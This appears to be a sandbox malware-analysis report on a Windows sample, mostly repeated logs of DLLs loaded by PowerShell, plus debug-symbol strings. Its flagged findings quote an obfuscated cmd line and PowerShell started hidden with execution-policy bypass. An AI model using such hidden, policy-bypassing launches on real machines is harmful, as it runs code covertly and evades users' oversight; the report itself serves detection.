Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: Microsoft.Powershell.PSReadline.pdbY source: powershell.exe, 00000009.00000002.1277542493.000001A8EFA49000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadLine.PDB source: powershell.exe, 00000009.00000002.1277542493.000001A8EFA49000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000009.00000002.1277542493.000001A8EFA49000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000009.00000002.1277542493.000001A8EFA74000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000009.00000002.1275619823.000001A8EF768000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1277542493.000001A8EFA49000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbDQ7Q source: powershell.exe, 00000009.00000002.1277542493.000001A8EFA49000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Core.pdb source: powershell.exe, 00000009.00000002.1277542493.000001A8EFA49000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000009.00000002.1277542493.000001A8EFA49000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.Powershell.PSReadline.pdb\|w source: powershell.exe, 00000009.00000002.1277542493.000001A8EFA49000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000009.00000002.1277542493.000001A8EFA74000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.Powershell.PSReadline.pdb( source: powershell.exe, 00000009.00000002.1277542493.000001A8EFA74000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1277542493.000001A8EFA74000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000009.00000002.1277542493.000001A8EFA49000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdbp;8 source: powershell.exe, 00000009.00000002.1277542493.000001A8EFA74000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 00000009.00000002.1277542493.000001A8EFA74000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000009.00000002.1277542493.000001A8EFA49000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Obfuscated command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\	Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -ep bypass
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -ep bypass	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFAACCA776A push eax; iretd		9_2_00007FFAACCA786D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFAACCB095D push esp; retf		9_2_00007FFAACCB095E

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
